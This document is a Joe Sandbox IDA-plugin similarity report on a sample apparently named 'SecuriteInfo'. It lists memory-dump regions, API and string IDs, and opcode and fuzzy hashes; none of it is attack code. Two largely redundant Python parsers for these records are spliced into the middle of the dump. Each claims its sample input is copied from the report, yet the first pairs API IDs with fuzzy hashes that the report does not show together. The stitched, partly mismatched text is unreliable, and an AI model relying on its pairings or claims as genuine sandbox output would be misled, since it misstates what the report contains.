• Instruction ID: a855d7f67c9c19ccf6e6848198e093915d2404bfa8fada61318c6f5e1b56d278
• Opcode Fuzzy Hash: a874e1fbcb87b1679a70b041231bde324e11352f9bfe845f561d2f4bfc2a184d
• Instruction Fuzzy Hash: 67614832B0824246E670AF69E42067E765AFB80788F846235EEDD9B7C9DF3CD501C700

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
• Instruction ID: 63391447ebb32783e9b174e1a1429cf72136b83c373123a6474f1ef3a5cbeb26
• Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
• Instruction Fuzzy Hash: 7D51B032A1A6038ADB16AB19D004A3AF391FB65B88F904134DB4E8774CEFBCE841D714

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
• Instruction ID: 8165432c39fffa61294ead53af646874ba316c37300f5e9d178a84ded1d9a76b
• Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
• Instruction Fuzzy Hash: 2D51C53250934286DB33AB29904426AF790FB66B84F988135DB4E87F8DDFBCE450C714
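The records above are the per-function similarity entries the Joe Sandbox IDA plugin emits: each names the memory dump (.sdmp) the function was lifted from, the module's image base ("Offset"), the other dumped regions of that module, and the Opcode / Instruction IDs and fuzzy hashes used for code-similarity matching. As an added example (not Joe Sandbox code), the Python below parses such records into structured data, decodes the protection field of each .sdmp descriptor so executable regions stand out, and indexes functions by Instruction Fuzzy Hash for pivoting between samples. The dotted-field layout of the .sdmp name (region address, PAGE_* protection, MEM_IMAGE type) is an assumption inferred from the values visible in this report, not taken from Joe Sandbox documentation; the two embedded records are copied from this page as constructed sample input.

```python
"""Parse Joe Sandbox per-function 'Memory Dump Source' / 'Similarity' records.
Added example for this report, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# winnt.h page-protection constants. ASSUMPTION (inferred from the values in this
# report, not from Joe Sandbox docs): in a .sdmp name the 16-digit field is the
# region address, the next field its PAGE_* protection, the seventh its type
# (01000000 = MEM_IMAGE).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
# <proc>.<phase>.<dump id>.<region address>.<protect>.<flag>.<type>.<module>.sdmp
SDMP_RE = re.compile(r"[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.(?P<addr>[0-9A-Fa-f]{16})\."
                     r"(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.(?P<mtype>[0-9A-Fa-f]{8})\."
                     r"[0-9A-Fa-f]{8}\.sdmp")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*?)\s*$")  # "• Key: value" rows

@dataclass
class Region:
    address: int
    protect: int
    mem_type: int  # 0x1000000 == MEM_IMAGE (image-backed section)

    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)  # PAGE_EXECUTE* occupy 0x10..0x80

@dataclass
class FunctionRecord:
    source: Region      # region the function's code was dumped from
    module_base: int    # the "Offset:" value, i.e. the module's image base
    associated: List[Region] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # Similarity rows

def parse_sdmp(name: str) -> Optional[Region]:
    m = SDMP_RE.search(name)  # search(): any trailing page residue is ignored
    return Region(int(m["addr"], 16), int(m["protect"], 16), int(m["mtype"], 16)) if m else None

def parse_records(text: str) -> List[FunctionRecord]:
    """A record starts at its 'Source File' row and owns the bulleted rows that
    follow it; unbulleted headings (APIs, Strings, Similarity, ...) are skipped."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        m = FIELD_RE.match(raw.strip())
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2)
        if key == "Source File":
            src, _, rest = value.partition(",")
            region = parse_sdmp(src)
            if region is None:
                continue
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
            cur = FunctionRecord(region, int(off.group(1), 16) if off else region.address)
            records.append(cur)
        elif cur is not None and key == "Associated":
            assoc = parse_sdmp(value)
            if assoc is not None:
                cur.associated.append(assoc)
        elif cur is not None:
            cur.fields[key] = value
    return records

def index_by_fuzzy(records: List[FunctionRecord]) -> Dict[str, List[FunctionRecord]]:
    """Pivot key: the same Instruction Fuzzy Hash is the same code shape even
    when load addresses differ between samples."""
    idx: Dict[str, List[FunctionRecord]] = {}
    for r in records:
        idx.setdefault(r.fields.get("Instruction Fuzzy Hash", ""), []).append(r)
    return idx

def executable_regions(records: List[FunctionRecord]) -> Dict[int, List[int]]:
    """Per module base, the sorted addresses of every executable dumped region."""
    out: Dict[int, set] = {}
    for r in records:
        regs = out.setdefault(r.module_base, set())
        regs.update(g.address for g in [r.source, *r.associated] if g.is_executable())
    return {base: sorted(addrs) for base, addrs in out.items()}

# Constructed sample input: two records copied from this report.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
Similarity
• API ID: _invalid_parameter_noinfo
• Instruction Fuzzy Hash: 89912722A0A64641E762BE2CC45037FB690AB6AB54FC44139DB5D437E9FEBCE445C320
APIs
• Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
• Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmp
• API ID: 00007B2246570
• Instruction Fuzzy Hash: 67614832B0824246E670AF69E42067E765AFB80788F846235EEDD9B7C9DF3CD501C700
"""
```

Running `executable_regions(parse_records(SAMPLE))` separates the main executable (one PAGE_EXECUTE_READ text region at 0x7FF7B2B61000 under image base 0x7FF7B2B60000) from the second module, whose code lives in PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY regions. Writable-and-executable image sections are worth a second look during triage, since a normal compiler-built PE does not need them; the protection names themselves are only as reliable as the assumed field layout noted above.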
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Strings
Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: ..\s\crypto\async\async.c$T
• API String ID: 0-2182492907
APIs
Strings
Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: getnameinfohtons
• String ID: $..\s\crypto\bio\b_addr.c
• API String ID: 1503050688-1606403076
Strings
Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: ..\s\crypto\bio\b_sock.c$J$host=
• API String ID: 0-1729655730
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF7B2B6352C,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B67F32
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: 00007B2245630
• String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
• API String ID: 1780217008-3633731555
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D107
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                    • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction ID: ddf51081c67b943464c89e5e1c38c6015651a196fc8e1ce876ce878806332cab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691EB32F0A65245F752BF6D944027EA7A0BB667C4F944139DF0E57AA8EF78D482C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                    • String ID: Operation not permitted$unknown
                                                                                                                                                                                                                                    • API String ID: 1452528299-31098287
                                                                                                                                                                                                                                    • Opcode ID: 6e039b2ae405bf32e902cb63e90cdd89e9ea5b2a185e5041757cc7b9f8671bd5
                                                                                                                                                                                                                                    • Instruction ID: 0e6958d97011803fe4c7c6b827165444cf72f7412c1e2d99ab1a912f7908ce8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e039b2ae405bf32e902cb63e90cdd89e9ea5b2a185e5041757cc7b9f8671bd5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1816D61B1864286FB309BE1E8B437927A8FF85788F445135E90E5739ADF3DE440E301
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                    • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction ID: ad79662c188449106420c7160dcfa43e40c403a8dd79396cade1bcf8527360e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513732F0611186EB15FF6C88556BEA761AF26358F90023ADF1D52BF9EF78A402C310
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                    • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                    • Instruction ID: 853517c2819e6cc1d8386f0a17bc09d206f202acd5d4a4e8436edd818eccc128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51B122E192418AF711EF78D4407BEB7A1AB69B58F504435DF1D4B6ACEF78E440C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction ID: 9c845aa00cd284ee15acc40bedeae4b2c7b9aeae3dbdd19f56e33b9c4a9f853a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE110621A0D14282F647A76DE54927BE252EBAA780FC84030DB4D87B9EEDBDD4C0C214
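The "Memory Dump Source" entries above encode, in the .sdmp file name, the process index, the dump base address and the page protection of the region each function was recovered from, which is what tells an analyst whether a function lives in a normally mapped PE section or in a writable-and-executable region. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the shape shown above, decodes the protection and type fields with the documented winnt.h PAGE_* and MEM_* constants, and lists regions that are both writable and executable. The positional layout of the .sdmp name (process, stage, dump id, base, protection, unknown field, type, module index) is an assumption inferred from the names in this report; the sample text is copied from the records above, with the "Download File" residue left in to show that the parser tolerates it.

```python
import re
from dataclasses import dataclass, field

# Page protection and region type constants from winnt.h (MEMORY_BASIC_INFORMATION).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# Assumed field layout of a Joe Sandbox .sdmp name, inferred from this report:
#   proc.stage.dumpid.base.protect.<unknown>.type.module.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<unknown>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass
class Region:
    name: str
    proc: int
    base: int
    protect: int
    mem_type: int
    module: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def writable_and_executable(self) -> bool:
        # True for PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY.
        return bool(self.protect & EXEC_MASK) and bool(self.protect & WRITE_MASK)


def parse_sdmp_name(text: str) -> Region:
    """Find the .sdmp name anywhere in a report line and decode its fields."""
    m = SDMP_RE.search(text)
    if not m:
        raise ValueError(f"no .sdmp name in: {text!r}")
    return Region(
        name=m.group(0),
        proc=int(m.group("proc"), 16),
        base=int(m.group("base"), 16),
        protect=int(m.group("protect"), 16),
        mem_type=int(m.group("type"), 16),
        module=int(m.group("module"), 16),
    )


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""
    regions: list = field(default_factory=list)


def parse_records(report_text: str) -> list:
    """One FunctionRecord per 'Memory Dump Source' block in the report text."""
    records, cur = [], None
    for raw in report_text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith(("Source File:", "Associated:")):
            cur.regions.append(parse_sdmp_name(line))
        elif line.startswith("API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
    return records


def writable_executable_regions(records: list) -> list:
    """(api_id, base, protection) for every region a function touches that is W+X."""
    return [
        (rec.api_id, f"0x{r.base:X}", r.protect_name)
        for rec in records
        for r in rec.regions
        if r.writable_and_executable
    ]


# Sample input copied from the records in this report section (two of the entries).
SAMPLE = """
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• Instruction Fuzzy Hash: 9691EB32F0A65245F752BF6D944027EA7A0BB667C4F944139DF0E57AA8EF78D482C320
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
• Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
• Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
Similarity
• API ID: ErrorLast
• String ID: Operation not permitted$unknown
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_id or "<no API id>", "->",
              [(f"0x{r.base:X}", r.protect_name, r.type_name, r.module) for r in rec.regions])
    print("W+X regions:", writable_executable_regions(parse_records(SAMPLE)))
```

Run against the full report text, the output separates functions whose code sits in a PAGE_EXECUTE_READ image section (the sample's own 0x7FF7B2B60000 module) from those recovered out of a PAGE_EXECUTE_READWRITE mapping (the 0x7FFD93D10000 module above); the latter is where a practitioner would look first when deciding which Opcode IDs and Instruction Fuzzy Hashes to pivot on.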
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: getaddrinfo
• String ID: ..\s\crypto\bio\b_addr.c
• API String ID: 300660673-2547254400
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B79046
  • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
